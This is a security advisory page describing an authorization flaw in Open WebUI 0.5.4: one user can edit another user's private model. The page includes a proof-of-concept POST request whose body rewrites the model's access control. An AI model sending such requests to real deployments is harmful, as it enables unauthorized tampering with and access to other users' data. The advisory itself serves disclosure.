PT-2026-59369 · Pypi · Open-Webui

Publicado

2026-07-13

·

Atualizado

2026-07-13

CVSS v3.1

6.5

Média

VetorAV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Summary

A user can modify another user's model even if its visibility is set to Private. The finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.

Details / PoC

The user Victim created a private model with the visibility set to private: grafik
The user Attacker can edit this model using the following POST request:
POST /api/v1/models/model/update?id=aaabraaa HTTP/2
Host: domain.local
//Some headers removed
Te: trailers

{"id":"aaabraaa","base model id":"gpt-4o-POC","name":"testmodel","meta":{"profile image url":"/static/favicon.png","description":"","capabilities":{"vision":true,"usage":false,"citations":true},"suggestion prompts":null,"tags":[],"toolIds":["test"]},"params":{},"user id":"565c82e6-083f-42bb-bf0f-a4e214cfb9ad","access control":{"read":{"group ids":[],"user ids":[]},"write":{"group ids":[],"user ids":[]}},"is active":true,"updated at":1737314575,"created at":1737121281}
Request / Response grafik

Impact

A user can modify another user's model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained.

Correção

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Identificadores relacionados

PYSEC-2026-2727

Produtos afetados

Open-Webui